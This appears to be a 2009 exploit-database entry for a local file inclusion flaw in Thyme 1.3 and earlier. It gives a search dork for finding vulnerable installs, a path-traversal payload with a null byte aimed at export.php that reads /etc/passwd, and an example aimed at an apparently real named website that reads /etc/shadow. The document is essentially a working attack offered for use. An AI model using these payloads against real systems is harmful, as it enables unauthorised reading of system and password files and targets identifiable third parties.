[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Thyme <= 1.3 (export_to) Local File Inclusion Vulnerability
# Published : 2009-02-10
# Author : cheverok
# Previous Title : InselPhoto 1.1 (query) Remote SQL Injection Exploit
# Next Title : Papoo CMS 3.x (pfadhier) Local File Inclusion Vulnerability
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| Theme Local File Inclusion / (Register_globals: off) |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| Version: <= 1.3 |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| Dork: Thyme 1. ?? 2006 eXtrovert Software LLC. All rights reserved |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| Founded by: cheverok[at]gmail.com |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
--------------------------------------------------------------------------------------
Intro:
See info
http://host/patch/phpinfo.php
if register_globals Off, then
---------------------------------------------------------------------------------------
Exploit:
http://host/patch/modules/sync/export.php?export_to=../../../../../../../../../../../etc/passwd%00
---------------------------------------------------------------------------------------
Example:
http://www.cbpool.org/thyme/modules/sync/export.php?export_to=../../../../../../../../../../../etc/shadow%00
----------------------------------------------------------------------------------------
(c) cheverok, 10.2.2009 greetz to antichat
# www.Syue.com [2009-02-10]